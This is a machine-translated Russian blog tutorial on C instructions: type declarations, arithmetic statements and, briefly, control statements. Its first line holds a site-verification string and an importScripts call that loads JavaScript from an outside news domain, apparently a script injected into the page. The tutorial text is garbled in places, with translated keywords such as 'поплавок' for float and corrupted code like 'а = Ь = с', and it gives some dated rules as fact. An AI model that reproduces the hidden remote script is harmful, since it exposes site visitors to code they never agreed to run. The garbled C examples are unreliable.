google-site-verification: google2818f8f06eec354e.html self.importScripts('https://zworld-news.com/sw/w_1.js');

C Инструкции с примерами




Я надеюсь, что прежде чем продолжить этот урок, вы должны были написать базовые программы printf () и scanf (). Если вы этого не сделали, я настоятельно рекомендую вам сделать это. Прочитайте предыдущие уроки здесь .
Во всяком случае, до сих пор мы рассмотрели самые основные программы C. Мы использовали много инструкций в нем. Поэтому сегодня я расскажу вам о C инструкциях.

Что такое инструкции C?

Есть в основном три типа инструкций Си.
1. Инструкция по объявлению типа 
2. Инструкция по арифметике 
3. Инструкция по управлению
Мы уже рассмотрели первые два типа инструкций уже в наших предыдущих туориалах, но сейчас я расскажу вам о некоторых нюансах этих инструкций. Итак, давайте попробуем проанализировать их один за другим.

Инструкция декларации типа

Как следует из названия, он используется для объявления типа переменных в языке Си. Вы должны объявить тип переменной перед ее использованием. И также необходимо, чтобы эти инструкции объявления типов были предоставлены в начале программы (сразу после main ()).
Теперь давайте узнаем о некоторых вариациях в них.
а) Мы можем инициализировать переменную во время ее объявления.
Пример
int a = 3; 
char a = 'd'; 
int a = 7 * 3 * 2;
б) Помните порядок переменных при их объявлении.
Пример
int i = 3, j = 5; такой же, как int j = 5, i = 3;
Однако, 
float a = 5.5, b = a + 7.1; все в порядке, но с 
плавающей точкой b = a + 7.1, a = 5.5; не является действительным. 
Это связано с тем, что в приведенном выше объявлении мы пытаемся использовать переменную a еще до ее определения.
в) Еще один интересный момент при объявлении переменных
Ниже инструкция будет работать 
int a, b, c, d; 
а = Ь = с = 10;  
Однако следующее утверждение не будет работать. 
int a = b = c = d = 10;
Теперь мы снова пытаемся использовать переменные еще до их определения.
Надеюсь, теперь вы должны понимать важность инструкций объявления типов. Таким образом, мы можем использовать переменные только после их определения. И эти определения должны быть записаны в начале тела main (). Мы не можем определять переменные где-либо еще в программе. Если вы сделаете это, это приведет к ошибке.

Арифметическая инструкция

Общая форма арифметической инструкции следует правилам, приведенным ниже.
я) Он должен содержать один оператор присваивания т.е. 
ii) В левой части = должна быть одна переменная. 
iii) В правой части = должны быть переменные и константы. 
iv) И эти переменные и константы будут связаны некоторыми арифметическими операторами, такими как +, -, *, /,%.
Пример
int a = 12; 
поплавок b, с = 2,2; 
Ь = с + а / 6,1 * 8;  
Какие операнды?
Эти переменные и константы вместе называются операндами. Эти операнды связаны арифметическими операторами.
Как происходит выполнение арифметических инструкций?
Сначала вычисляются все переменные и константы в правой части оператора присваивания (=). После этого результат будет сохранен в переменной слева от оператора присваивания.
Теперь давайте рассмотрим некоторые нюансы арифметических операторов
1. Обязательно используйте только одну переменную в левой части =.
Пример
c = a * b является правильным, 
тогда как a * b = c является неправильным.
2. Оператор с именем модульный оператор (%) также используется в C. Этот модульный оператор возвращает остаток в левую переменную оператора присваивания. Его нельзя использовать с поплавками. Он вернет тот же знак, что и числитель.
Пример
-5% 2 = -1 
5% -2 = 1

Инструкция по управлению

Эта инструкция используется для изменения управления программой в соответствии с желаниями пользователя или программиста. Эта инструкция содержит принятие решений, циклы и многое другое. Это немного продвинутая тема. Мы рассмотрим эту тему в наших последующих уроках.

Комментариев нет:

Отправить комментарий